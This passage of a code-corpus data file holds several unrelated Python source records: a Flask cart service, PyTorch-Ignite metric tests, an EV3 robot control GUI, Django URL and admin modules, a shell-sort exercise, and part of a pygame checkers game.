methods=[\"GET\"])\r\ndef dobaviSaRacuna(id_korisnika):\r\n    cursor = mysql.get_db().cursor()\r\n    cursor.execute(\"SELECT racun_id FROM korisnik_racun WHERE korisnik_id = %s\", id_korisnika)\r\n    id_racuna = cursor.fetchall()\r\n    rows = []\r\n    for x in range(0, len(id_racuna)):\r\n        q = '''SELECT * FROM racun_proizvod LEFT JOIN proizvod ON proizvod_id = proizvod.id \r\n            LEFT JOIN racun ON racun_id = racun.id WHERE racun_id = %s'''\r\n        cursor.execute(q, id_racuna[x][\"racun_id\"])\r\n        row = cursor.fetchall()\r\n        if row is not None:\r\n            for x in row:\r\n                rows.append(x)\r\n\r\n    for x in range(0, len(rows)):\r\n        files = os.listdir(\"static/proizvodi\")\r\n        slika = fnmatch.filter(files, \"proizvod_{0}.*\".format(rows[x][\"id\"]))\r\n        if slika != []:\r\n            rows[x][\"slika\"] = slika[0]\r\n\r\n    return flask.jsonify(rows)\r\n\r\n@korpa_service.route(\"/izmeniKorpu/\", methods=[\"PUT\"])\r\ndef izmeni_korpu():\r\n    data = request.json\r\n    db = mysql.get_db()\r\n    cursor = db.cursor()\r\n    q = '''UPDATE korpa_proizvod SET kolicina=%s WHERE korpa_id=%s AND proizvod_id = %s'''\r\n    cursor.execute(q, (data[\"kolicina\"], data[\"korpa_id\"], data[\"proizvod_id\"]))\r\n    db.commit()\r\n\r\n    return flask.jsonify({\"status\": \"done\"}), 201\r\n\r\n@korpa_service.route(\"/ukloniIzKorpe/<id_korpe>/<id_proizvoda>\", methods=[\"DELETE\"])\r\ndef ukloni(id_korpe, id_proizvoda):\r\n    db = mysql.get_db()\r\n    cursor = db.cursor()\r\n    q = '''DELETE FROM korpa_proizvod WHERE korpa_id=%s AND proizvod_id = %s'''\r\n    cursor.execute(q, (id_korpe, id_proizvoda))\r\n    db.commit()\r\n\r\n    return flask.jsonify({\"status\": \"done\"}), 201\r\n\r\n@korpa_service.route(\"/ukloniSveIzKorpe/<id_korpe>\", methods=[\"DELETE\"])\r\ndef ukloniSveIzKorpe(id_korpe):\r\n    db = mysql.get_db()\r\n    cursor = db.cursor()\r\n    q = '''DELETE FROM korpa_proizvod WHERE korpa_id=%s'''\r\n    cursor.execute(q, (id_korpe))\r\n    db.commit()\r\n\r\n    return flask.jsonify({\"status\": \"done\"}), 201","sub_path":"blueprints/korpa_service.py","file_name":"korpa_service.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"575335020","text":"from ignite.exceptions import NotComputableError\nfrom ignite.metrics import MeanSquaredError\nimport pytest\nimport torch\n\n\ndef test_zero_div():\n    mse = MeanSquaredError()\n    with pytest.raises(NotComputableError):\n        mse.compute()\n\n\ndef test_compute():\n    mse = MeanSquaredError()\n\n    y_pred = torch.Tensor([[2.0], [-2.0]])\n    y = torch.zeros(2)\n    mse.update((y_pred, y))\n    assert isinstance(mse.compute(), float)\n    assert mse.compute() == 4.0\n\n    mse.reset()\n    y_pred = torch.Tensor([[3.0], [-3.0]])\n    y = torch.zeros(2)\n    mse.update((y_pred, y))\n    assert isinstance(mse.compute(), float)\n    assert mse.compute() == 9.0\n","sub_path":"tests/ignite/metrics/test_mean_squared_error.py","file_name":"test_mean_squared_error.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"356948287","text":"\"\"\"\n    Capstone Project. Code to run on a LAPTOP (NOT the robot).\n    Displays the Graphical User Interface (GUI) and communicates with the robot.\n\n    Authors: Your professors (for the framework)\n        and Trey Kline.\n    Winter term, 2018-2019.\n\"\"\"\n\nimport mqtt_remote_method_calls as com\nimport shared_gui\nimport tkinter\nfrom tkinter import ttk\n\ndef main():\n    \"\"\"\n    This code, which must run on a LAPTOP:\n    1. Constructs a GUI for my part of the Capstone Project.\n    2. 
Communicates via MQTT with the code that runs on the EV3 robot.\n \"\"\"\n # -------------------------------------------------------------------------\n # Construct and connect the MQTT Client:\n # -------------------------------------------------------------------------\n mqtt_sender = com.MqttClient()\n mqtt_sender.connect_to_ev3()\n\n # -------------------------------------------------------------------------\n # The root TK object for the GUI:\n # -------------------------------------------------------------------------\n root = tkinter.Tk()\n root.title('BSSE 420 Bapstone Broject')\n music_window = tkinter.Tk()\n music_window.title('Maestro Bot')\n\n\n\n # -------------------------------------------------------------------------\n # The main frame, upon which the other frames are placed.\n # -------------------------------------------------------------------------\n main_frame = ttk.Frame(root, padding=10, borderwidth=5, relief='groove')\n music_frame = ttk.Frame(music_window, padding=10, borderwidth=5, relief='groove')\n main_frame.grid()\n music_frame.grid()\n\n # -------------------------------------------------------------------------\n # Sub-frames for the shared GUI that the team developed:\n # -------------------------------------------------------------------------\n teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame = get_shared_frames(main_frame, mqtt_sender)\n find_object = get_my_frames(main_frame, mqtt_sender)\n\n # -------------------------------------------------------------------------\n # Frames that are particular to my individual contributions to the project.\n # -------------------------------------------------------------------------\n # TODO: Implement and call get_my_frames(...)\n maestro_bot_frames = get_music_frames(music_window, mqtt_sender)\n\n # -------------------------------------------------------------------------\n # Grid the frames.\n # -------------------------------------------------------------------------\n grid_frames(teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame, find_object)\n maestro_bot_frames.grid(row=0, column=0)\n\n # -------------------------------------------------------------------------\n # The event loop:\n # -------------------------------------------------------------------------\n root.mainloop()\n music_window.mainloop()\n\n\ndef get_shared_frames(main_frame, mqtt_sender):\n teleop_frame = shared_gui.get_teleoperation_frame(main_frame, mqtt_sender)\n arm_frame = shared_gui.get_arm_frame(main_frame, mqtt_sender)\n control_frame = shared_gui.get_control_frame(main_frame, mqtt_sender)\n sound_frame = shared_gui.get_sound_frame(main_frame, mqtt_sender)\n color_frame = shared_gui.get_color_frame(main_frame, mqtt_sender)\n proximity_frame = shared_gui.get_proximity_frame(main_frame, mqtt_sender)\n camera_frame = shared_gui.get_camera_frame(main_frame, mqtt_sender)\n return teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame\n\ndef grid_frames(teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame, find_object):\n teleop_frame.grid(row=0, column=0)\n arm_frame.grid(row=1, column=0)\n control_frame.grid(row=2, column=0)\n sound_frame.grid(row=3, column=0)\n color_frame.grid(row=4, column=0)\n proximity_frame.grid(row=5, column=0)\n camera_frame.grid(row=0, column=1)\n find_object.grid(row=1, column=1)\n\ndef get_my_frames(window, mqtt_sender):\n frame = 
ttk.Frame(window, padding=10, borderwidth=5, relief=\"ridge\")\n frame.grid()\n\n frame_label = ttk.Label(frame, text=\"Find Object and Make Tones\")\n freq_lable = ttk.Label(frame, text='Starting Frequency')\n rate_lable = ttk.Label(frame, text='Rate of Increase')\n\n freq_entry = ttk.Entry(frame, width='8')\n rate_entry = ttk.Entry(frame, width='8')\n\n start_button=ttk.Button(frame, text='Find Using IR')\n clockwise_button=ttk.Button(frame, text='Spin clockwise and Find')\n counterclockwise_button = ttk.Button(frame, text='Spin counterclockwise and Find')\n\n frame_label.grid(row=0, column=0)\n freq_lable.grid(row=1, column=0)\n freq_entry.grid(row=1, column=1)\n rate_lable.grid(row=2, column=0)\n rate_entry.grid(row=2, column=1)\n start_button.grid(row=3, column=0)\n clockwise_button.grid(row=3, column=1)\n counterclockwise_button.grid(row=3, column=2)\n\n start_button['command'] = lambda : handle_find_object_ir(freq_entry, rate_entry, mqtt_sender)\n clockwise_button['command'] = lambda : handle_find_object_camera(freq_entry, rate_entry, 1, mqtt_sender)\n counterclockwise_button['command'] = lambda: handle_find_object_camera(freq_entry, rate_entry, 0, mqtt_sender)\n\n return frame\n\ndef get_music_frames(window, mqtt_sender):\n frame = ttk.Frame(window, padding=10, borderwidth=5, relief='ridge')\n frame.grid()\n\n frame_lable = ttk.Label(frame, text='Maestro Bot')\n songs_button = ttk.Button(frame, text='Play built in songs')\n tempo_lable = ttk.Label(frame, text='tempo')\n\n dropdown = ttk.Combobox(frame)\n dropdown['values'] = ('Sans Undertale', 'All Star', 'Mobamba')\n dance_button = ttk.Button(frame, text='Dance')\n compose_music = ttk.Button(frame, text='Compose Music')\n read_music = ttk.Button(frame, text='Read Music')\n dame_tu_cosita = ttk.Button(frame, text='Dame tu Cosita')\n\n bpm_dance_box = ttk.Entry(frame, width='8')\n tempo_box = ttk.Entry(frame, width='8')\n times_box = ttk.Entry(frame, width='8')\n times_dance_box = ttk.Entry(frame, width='8')\n\n frame_lable.grid(row=0, column=0)\n songs_button.grid(row=1, column=0)\n dropdown.grid(row=1, column=1)\n times_box.grid(row=1, column=2)\n dance_button.grid(row=2, column=0)\n times_dance_box.grid(row=2, column=2)\n bpm_dance_box.grid(row=2, column=1)\n compose_music.grid(row=3, column=0)\n read_music.grid(row=4, column=0)\n tempo_lable.grid(row=4, column=1)\n tempo_box.grid(row=4, column=2)\n\n dance_button['command'] = lambda : handle_dance(bpm_dance_box, times_dance_box, mqtt_sender)\n read_music['command'] = lambda : handle_read_music(tempo_box, mqtt_sender)\n compose_music['command']=lambda : handle_write_music(mqtt_sender)\n dame_tu_cosita['command'] = lambda : handle_dame_tu_cosita(mqtt_sender)\n songs_button['command'] = lambda : handle_play_prebuilt_music(dropdown.current(), times_box, mqtt_sender)\n\n return frame\n\n\ndef handle_play_prebuilt_music(song, times, mqtt_sender):\n print('Playing song', song, times.get(), 'times')\n mqtt_sender.send_message('play_prebuilt_music', [int(song), int(times.get())])\n\ndef handle_dance(tempo, times, mqtt_sender):\n print('Dancing at ', tempo.get(), 'bpm', times.get(), 'times')\n mqtt_sender.send_message('dance', [int(tempo.get()), int(times.get())])\n\ndef handle_read_music(tempo, mqtt_sender):\n print('Reading music')\n mqtt_sender.send_message('read_music', [int(tempo.get())])\n\ndef handle_write_music(mqtt_sender):\n print('Writing Music')\n mqtt_sender.send_message('write_music', [])\n\ndef handle_dame_tu_cosita(mqtt_sender):\n print('Calling dame tu cosita at 3 AM')\n 
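# Hands the action off to the robot: the EV3-side delegate is expected to expose a matching 'dame_tu_cosita' method.\n    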
mqtt_sender.send_message('dame_tu_cosita', [])\n\ndef handle_find_object_ir(freq, rate, mqtt_sender):\n print('Finding object', freq.get(), rate.get())\n mqtt_sender.send_message('m2_find_object_ir', [int(freq.get()), int(rate.get())])\n\ndef handle_find_object_camera(freq, rate, clockwise, mqtt_sender):\n print('Spinning and the finding object', freq.get(), rate.get(), clockwise)\n mqtt_sender.send_message('m2_find_object_camera', [int(freq.get()), int(rate.get()), int(clockwise)])\n\n\n\n# -----------------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# -----------------------------------------------------------------------------\nmain()","sub_path":"src/m2_run_this_on_laptop.py","file_name":"m2_run_this_on_laptop.py","file_ext":"py","file_size_in_byte":8473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"550239233","text":"from .views import show_item,show_checkout,show_order,get_category,search,homepage,reciept,contact,how_it_works_page,maintence,restaurant_list\nfrom django.conf.urls.defaults import patterns, include, url\n\n\nurlpatterns = patterns('',\n#\turl(r'^$',maintence,name=\"maintenance\"),\n#\turl(r'^$',homepage,name=\"homepage\"),\n url(r'^$',restaurant_list,name=\"restaurant_list\"),\n\turl(r'^menu/(\\d+)$',get_category, name=\"f4l_menu\"),\n\turl(r'^your_order/(?P\\d+)/$',show_order,name=\"order_index\"),\n\turl(r'^item/(?P\\d+)/$',show_item, name=\"item_order\"),\n\turl(r'^checkout/(?P\\d+)/$',show_checkout,name=\"checkout\"),\n\turl(r'^reciept/$',reciept,name=\"checkout_reciept\"),\n\turl(r'^search_results/$',search,name=\"search\"),\n\turl(r'^contact/$',contact,name=\"contact_us\"),\n#\turl(r'^how_it_works/$',how_it_works_page,name=\"how_it_works\"),\n\turl(r'^captcha/',include('captcha.urls')),\n\n#\turl(r'^homepage$',homepage,name=\"homepage\"),\n#\turl(r'^form/$',tryout_form,name=\"tryout\")\n # url(r'^search/(\\d+)$',search,name=\"search\"),\n)\n#urlpatterns += patterns('/^item/',url(r'^$', show_item, name = \"item_order\"),)\n","sub_path":"live/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"388783528","text":"'''\nCreated on 07/10/2015\n\n@author: vitorcunha\n'''\nimport unittest\nimport os.path\n\nfrom editor_grafico import EditorGrafico\n\nclass Test(unittest.TestCase):\n \n e = EditorGrafico()\n\n# def testCmdI(self):\n# img = self.e.cmdI(5, 6)\n# assert len(img) == 5\n# assert len(img[0]) == 6\n# \n# \n# def testCmdC(self):\n# img = self.e.cmdC()\n# for linha in img:\n# for c in linha:\n# assert str(c) == '0'\n# \n# \n# def testCmdL(self):\n# img = self.e.cmdL(2,3, 'A')\n# assert img[2][3] == 'A'\n# \n# def testCmdS(self):\n# fname = \"one.bmp\"\n# img = self.e.cmdS(fname);\n# assert os.path.isfile(fname) \n# \n# def testCmdV(self):\n# pass\n\n \n def testEntrada1(self):\n self.e.cmdI(5,6)\n self.e.cmdL(2,3, 'A')\n self.e.cmdS(\"one.bmp\")\n self.e.cmdP()\n \n self.e.cmdV( 2, 3, 4, 'W')\n self.e.cmdH( 3, 4, 2, 'Z')\n self.e.cmdF( 3, 3, 'J')\n self.e.cmdS(\"two.bmp\")\n \n self.e.cmdP()\n\n def testEntrada2(self):\n self.e.cmdI(10,9)\n self.e.cmdL(5,3, 'A')\n self.e.cmdV(2,3, 4, 'W')\n self.e.cmdH(1, 10,5, 'Z')\n self.e.cmdF(3,3, 'J')\n self.e.cmdK(2,7, 8,8, 'E')\n self.e.cmdF(9,9, 'R')\n self.e.cmdP()\n \n def testCmdF(self):\n self.e.cmdI(5,5)\n self.e.cmdF(3,3, 'A')\n\n 
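# Added sketch: one extra check exercising cmdK (block fill), mirroring the call shape already used in testEntrada2 above.\n    def testCmdK(self):\n        self.e.cmdI(4, 4)\n        self.e.cmdK(1, 1, 2, 2, 'B')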
\n","sub_path":"editor/editor_test.py","file_name":"editor_test.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130973566","text":"from django.contrib import admin\nfrom django.contrib.auth.models import Group\nfrom django.db.models import Count, Q\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom trix.trix_core import models as coremodels\n\n\ndef set_administrators(modeladmin, request, queryset):\n queryset.update(is_admin=True)\nset_administrators.short_description = _(\"Give admin access to the selected users\")\n\n\ndef unset_administrators(modeladmin, request, queryset):\n queryset.update(is_admin=False)\nunset_administrators.short_description = _(\"Remove admin access from the selected users\")\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = [\n 'email',\n 'is_admin',\n 'last_login',\n ]\n search_fields = ['email']\n list_filter = [\n 'is_admin',\n 'last_login',\n ]\n fields = ['email', 'is_admin']\n readonly_fields = ['last_login']\n actions = [set_administrators, unset_administrators]\n\nadmin.site.register(coremodels.User, UserAdmin)\n\n\n# class AssignmentAdmin(admin.ModelAdmin):\n# list_display = (\n# 'title',\n# 'get_tags',\n# 'created_datetime',\n# 'lastupdate_datetime',\n# )\n# search_fields = ['title', 'tags__tag']\n# filter_horizontal = ['tags']\n# list_filter = [\n# 'created_datetime',\n# 'lastupdate_datetime',\n# 'tags',\n# ]\n#\n# def get_tags(self, course):\n# return u','.join(tag.tag for tag in course.tags.all())\n# get_tags.short_description = 'Tags'\n#\n# def get_queryset(self, request):\n# queryset = super(AssignmentAdmin, self).get_queryset(request)\n# queryset = queryset.prefetch_related('tags')\n# return queryset\n#\n#\n# admin.site.register(coremodels.Assignment, AssignmentAdmin)\n\n\nclass TagInUseFilter(admin.SimpleListFilter):\n title = _('tag is in use')\n parameter_name = 'tag_is_in_use'\n\n def lookups(self, request, model_admin):\n return (\n ('yes', _('Yes')),\n ('no', _('No')),\n )\n\n def queryset(self, request, queryset):\n if self.value() == 'yes':\n return queryset.filter(\n Q(assignment__count__gt=0) |\n Q(active_period_set__count__gt=0) |\n Q(course_set__count__gt=0)\n )\n if self.value() == 'no':\n return queryset.filter(\n Q(assignment__count=0) &\n Q(active_period_set__count=0) &\n Q(course_set__count=0)\n )\n\n\nclass TagAdmin(admin.ModelAdmin):\n search_fields = ['tag']\n list_display = [\n 'tag',\n 'category',\n 'get_assignment_count',\n 'is_in_use'\n ]\n list_filter = [TagInUseFilter]\n\n def get_queryset(self, request):\n return super(TagAdmin, self).get_queryset(request)\\\n .annotate(\n Count('assignment', distinct=True),\n Count('active_period_set', distinct=True),\n Count('course_set', distinct=True))\n\n def get_assignment_count(self, tag):\n return unicode(tag.assignment__count)\n get_assignment_count.short_description = _('Number of assignments')\n get_assignment_count.admin_order_field = 'assignment__count'\n\n def is_in_use(self, tag):\n return (tag.assignment__count + tag.active_period_set__count + tag.course_set__count) > 0\n is_in_use.short_description = _('Is in use')\n is_in_use.boolean = True\n\nadmin.site.register(coremodels.Tag, TagAdmin)\n\n\nclass CourseAdmin(admin.ModelAdmin):\n list_display = (\n 'course_tag',\n 'active_period',\n 'get_admins',\n\n )\n search_fields = [\n 'course_tag__tag',\n 'description',\n 'active_period__tag',\n ]\n filter_horizontal = ['admins']\n raw_id_fields = 
['course_tag', 'active_period']\n\n def get_admins(self, course):\n return u','.join(unicode(user) for user in course.admins.all())\n get_admins.short_description = 'Admins'\n\n def get_queryset(self, request):\n queryset = super(CourseAdmin, self).get_queryset(request)\n queryset = queryset\\\n .select_related('course_tag', 'active_period')\\\n .prefetch_related('admins')\n return queryset\n\nadmin.site.register(coremodels.Course, CourseAdmin)\n\n\n# class PermalinkAdmin(admin.ModelAdmin):\n# list_display = (\n# 'course',\n# 'title',\n# 'get_tags',\n# )\n# search_fields = [\n# 'tags__tag',\n# 'title',\n# 'description',\n# 'course__course_tag__tag',\n# ]\n# filter_horizontal = ['tags']\n# raw_id_fields = ['course']\n# list_filter = [\n# 'tags',\n# ]\n#\n# def get_tags(self, permalink):\n# return u','.join(tag.tag for tag in permalink.tags.all())\n# get_tags.short_description = 'Tags'\n#\n# def get_queryset(self, request):\n# queryset = super(PermalinkAdmin, self).get_queryset(request)\n# queryset = queryset\\\n# .select_related('course', 'course__course_tag')\\\n# .prefetch_related('tags')\n# return queryset\n\n\n# admin.site.register(coremodels.Permalink, PermalinkAdmin)\n\n# Unregister auth.groups\nadmin.site.unregister(Group)\n","sub_path":"trix/trix_core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135844379","text":"\n\ndef get_min_swap_count(arr, size_of_array):\n misplaced_count = 0\n gap = int(size_of_array/2)\n\n while gap > 0:\n for i in range(gap, size_of_array):\n temp = arr[i]\n j = i\n while j >= gap and arr[ j - gap] > temp:\n arr[j] = arr[j - gap]\n misplaced_count += 1\n j -= gap\n arr[j] = temp\n gap //= 2\n #print(arr)\n return misplaced_count\n\n\n\nif __name__ == \"__main__\":\n \"\"\"\n https://www.hackerrank.com/challenges/minimum-swaps-2/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=arrays\n \"\"\"\n size_of_array = int(input())\n arr = [int(x) for x in input().split()]\n result = get_min_swap_count(arr, size_of_array)\n print(result)\n'''\n 12 34 52 2 3\n n = 5/2 = 2\n \n 4\n\n \n'''","sub_path":"InterViewPrepKit/Array/Minimum_Swap_2.py","file_name":"Minimum_Swap_2.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"578060587","text":"import sys\nimport pygame as pg\nimport logging\nimport Project_GameState\nfrom settings import *\n\n# What each module does\n# sys - This will set the recursion limit so that algorithms won't run on forever.\n# settings - This will import the settings file in the current directory.\n\n# Importing the GameState which will be used purely as the GUI for the application. As it\n# As it stands right now, we draw the GUI information from a mix of this file and\n# the GameState. 
In the next update the DisplayState will have more of that responsibility.\nfrom Project_GameState import GameState as DisplayState\n\n# set which version of the GameState you will use for each Player in the game\nfrom Project_GameState import GameState as P1GameState\nfrom Project_GameState import GameState as P2GameState\n\n# set which Player object you will use for each Player in the game\nP1Player = Project_GameState.Player_AlphaBeta(1, 0)\nP2Player = Project_GameState.Player_AlphaBeta(2, 0) # Project_GameState.Player_AlphaBeta(2, 0)\n\n# The basic Checkers class.\nclass Checkers:\n # The init function where we initalize important information about pygame and checkers.\n def __init__(self):\n # print(\"+INITIALIZED77777+\")\n pg.init() # This initializes pygame, must be done.\n pg.display.set_caption(TITLE) # Sets title of the window as defined in settings.\n self.clock = pg.time.Clock() # Used to set the FPS.\n self.display_state = DisplayState(BOARD_ROWS, BOARD_COLS) # Used to display the GUI\n self.width = self.display_state.cols() * TILESIZE # Width of screen.\n self.height = self.display_state.rows() * TILESIZE + 40 # Height of screen.\n self.screen = pg.display.set_mode( (self.width, self.height) ) # Window Size.\n self.font = pg.font.SysFont(FONTNAME, FONTSIZE, bold=FONTBOLD) # Used later.\n self.winner = PLAYER_NONE # Won't need to worry about this for now.\n self.text_position = (10, self.height-35) # Used later.\n self.player_states = [P1GameState(BOARD_ROWS, BOARD_COLS), P2GameState(BOARD_ROWS, BOARD_COLS)]\n self.players = [P1Player, P2Player]\n\n # Variables used to create the checkerboard pattern background.\n self.flip_color = True # Used to switch background colors when drawing the board.\n\n # The main game update loop of the application\n def update(self):\n # This sets a limit on how fast our computers process the drawing code.\\\n self.dt = self.clock.tick(FPS) / 1000\n self.do_turn()\n self.events() # This will check for any input.\n self.draw() # Draw everything on the screen.\n\n # This will draw everything on the screen.\n def draw(self):\n # Add another parameter for king color.\n self.draw_board() # Draw the basic checkerboard for the background.\n\n # Determine if there's a winner.\n player = self.display_state.player_to_move()\n if (self.winner == PLAYER_NONE):\n self.draw_text(PLAYER_NAMES[player] + (\": Human\" if self.players[player] == None else \": AI Thinking\"), self.text_position, PIECECOLOR[player])\n else: \n self.draw_text(GAME_RESULT_STRING[self.winner], self.text_position, PIECECOLOR[self.winner])\n \n self.draw_piece_list(self.screen, self.display_state.red_piece_list, RED, 2) # Draw all the red pieces.\n self.draw_piece_list(self.screen, self.display_state.black_piece_list, BLACK, 2) # Draw all the black pieces.\n\n # If a player has pressed down on a piece then highlight potential moves.\n self.draw_piece_list(self.screen, self.display_state.red_piece_potential_move_list, WHITE, 2) # Draw all potential red moves on board.\n self.draw_piece_list(self.screen, self.display_state.black_piece_potential_move_list, WHITE, 2) # Draw all potential red moves on board.\n pg.display.flip() # Paint the graphics to the screen.\n\n # This will draw the checkered background of the checkers screen.\n def draw_board(self):\n # This must always be reinitialized or else colors will constantly be flashing.\n self.flip_color = True\n self.screen.fill(BG_COLOR_1) # Fill the Background to BG Colour 2.\n \n # Draw all the tiles on the screen.\n # NOTE: We don't use 
drawrect to create a rectangle but we instead fill the part\n # of the screen(like paintbucket in MS Paint/Photoshop) to fill in the checkerboard\n # design.\n for c in range(self.display_state.cols()):\n for r in range(self.display_state.rows()):\n # Draw a colored tile on the screen depending on flip_color value.\n if (self.flip_color == True):\n self.screen.fill(BG_COLOR_1, (c*TILESIZE, r*TILESIZE, TILESIZE*1, TILESIZE*1))\n self.flip_color = False # Draw the next tile a different color.\n else:\n self.screen.fill(BG_COLOR_2, (c*TILESIZE, r*TILESIZE, TILESIZE*1, TILESIZE*1))\n self.flip_color = True # Draw the next tile a different color.\n\n # Flip the color again so the next column starts with a different color.\n self.flip_color = not self.flip_color \n\n # This will draw a list of pieces on a board using a list of tuples.\n def draw_piece_list(self, surface, piece_list, color, border):\n # For every piece in given list, draw a piece at that row and column.\n for piece in piece_list:\n row, col = self.display_state.rows() - 1 - piece[0], piece[1]\n \n if (piece in self.display_state.red_king_piece_list) or (piece in self.display_state.black_king_piece_list):\n pg.draw.circle(surface, color, (col*TILESIZE+TILESIZE//2, row*TILESIZE+TILESIZE//2), TILESIZE//2-PIECEPAD)\n pg.draw.circle(surface, GOLD, (col*TILESIZE+TILESIZE//2, row*TILESIZE+TILESIZE//2), TILESIZE//2-PIECEPAD, border)\n else:\n pg.draw.circle(surface, color, (col*TILESIZE+TILESIZE//2, row*TILESIZE+TILESIZE//2), TILESIZE//2-PIECEPAD)\n\n # draw some text with the given arguments\n def draw_text(self, text, pos, color):\n label = self.font.render(text, 1, color)\n self.screen.blit(label, pos)\n \n # reset the game to a the default state board\n def reset(self):\n # print(\"Reset\")\n self.winner = PLAYER_NONE\n self.display_state = DisplayState(BOARD_ROWS, BOARD_COLS)\n self.player_states[0] = P1GameState(BOARD_ROWS, BOARD_COLS)\n self.player_states[1] = P2GameState(BOARD_ROWS, BOARD_COLS)\n\n # This will execute a move when passed a new row/column location.\n def do_move(self, move):\n # print(\"about to do move\")\n player = self.display_state.player_to_move()\n # print(\"do move player is \", player)\n # print(\"self.players[player] is \", self.players[player])\n # print(\"move is \", move)\n\n # This if statement is used to change the selected index to the one alpha beta\n # generated when it found the best move.\n if self.players[player] != None:\n # # print(\"AI temp_best_just_done_move is \", self.players[player].temp_best_just_done_move_B)\n # # print(\"AI self.players[player].temp_best_selected_piece is \", self.players[player].temp_best_selected_piece_B)\n # # print(\"AI self.players[player].temp_red_pieces_to_remove_list is \", self.players[player].temp_red_pieces_to_remove_list_B)\n # print(\"move is \", move)\n self.display_state.selected_piece = self.players[player].temp_best_selected_piece_B\n self.player_states[0].selected_piece = self.players[player].temp_best_selected_piece_B\n self.player_states[1].selected_piece = self.players[player].temp_best_selected_piece_B\n\n # Updating the red pieces to remove list.\n self.display_state.red_pieces_to_remove_list = self.players[player].temp_red_pieces_to_remove_list_B\n self.player_states[0].red_pieces_to_remove_list = self.players[player].temp_red_pieces_to_remove_list_B\n self.player_states[1].red_pieces_to_remove_list = self.players[player].temp_red_pieces_to_remove_list_B\n\n # Updating the black pieces to remove list.\n 
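# (All three GameState copies below are kept in lock-step so the GUI and both AI players see the same board.)\n            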
self.display_state.black_pieces_to_remove_list = self.players[player].temp_black_pieces_to_remove_list\n self.player_states[0].black_pieces_to_remove_list = self.players[player].temp_black_pieces_to_remove_list\n self.player_states[1].black_pieces_to_remove_list = self.players[player].temp_black_pieces_to_remove_list\n \n\n # print(\"do move\")\n # Check for winner and do move.\n self.winner = self.display_state.winner()\n self.display_state.do_move(move)\n self.player_states[0].do_move(move)\n self.player_states[1].do_move(move)\n\n # This function will do a basic move\n def do_turn(self):\n # # print(\"do turn\")\n self.winner = self.display_state.winner()\n if self.winner == PLAYER_NONE: # there is no winner yet, so get the next move from the AI\n player = self.display_state.player_to_move() # get the next player to move from the state\n # # print(\"------ \", player)\n if self.players[player] != None: # if the current player is an AI, get its move\n # print(\"About to do turn\")\n \n if (player == 0):\n # NOTE: If both uncommented, program will break.\n # Uncomment out this line if you want a AB move.\n # self.do_move(self.players[player].get_move(self.player_states[player])) # Get an alpha beta move.\n\n # Uncomment out this line if you want a random move\n self.do_move(self.players[player].get_random_move(self.player_states[player])) # Get a random move.\n elif (player == 1):\n # NOTE: If both uncommented, program will break.\n # Uncomment out this line if you want a AB move.\n self.do_move(self.players[player].get_move(self.player_states[player])) # Get an alpha beta move.\n\n # Uncomment out this line if you want a random move\n # self.do_move(self.players[player].get_random_move(self.player_states[player])) # Get a random mov\n \n \n # Returns the tile (r,c) on the grid underneath a given mouse position in pixels\n def get_tile(self, mpos):\n return (mpos[1] // TILESIZE, mpos[0] // TILESIZE)\n\n # This function will handle all user input handling.\n def events(self):\n # Loop through every event occuring.\n for event in pg.event.get():\n # If user hit the X button on window, then quit.\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n \n # Check if a key is pressed down.\n if event.type == pg.KEYDOWN:\n # Reset board to starting state.\n if event.key == pg.K_r: self.reset()\n \n # ALL DEBUGGING STUFF.\n # If left key pressed, move a black piece.\n if event.key == pg.K_LEFT:\n print(\"LEFT\")\n # self.do_move_by_index(self.black_piece_list, 9, LEGAL_BLACK_ACTIONS[1])\n\n # If left key pressed, move a red piece.\n if event.key == pg.K_RIGHT:\n print(\"RIGHT\")\n # self.do_move_by_index(self.red_piece_list, 9, LEGAL_RED_ACTIONS[1])\n\n # If D is pressed down, print debuging information\n if event.key == pg.K_d:\n # print(\"Debugging is cool\")\n player = self.display_state.player_to_move()\n # # print(\"-- random is \", self.players[0].get_random_move(self.player_states[player]))\n # print(\"Display state red pieces are \", self.display_state.red_piece_list)\n\n # Check if a mousebutton is pressed down.\n if event.type == pg.MOUSEBUTTONDOWN:\n if pg.mouse.get_pressed()[0]:\n move = self.get_tile(event.pos)\n repositioned_row = move[0] - (BOARD_ROWS - 1)\n move = (abs(repositioned_row), move[1])\n # print(\"Move pressed is \", move)\n\n red_p_moves = self.display_state.red_piece_potential_move_list\n black_p_moves = self.display_state.black_piece_potential_move_list\n \n # If player clicked on a potential move then go to that postion.\n if ((move in red_p_moves or move in 
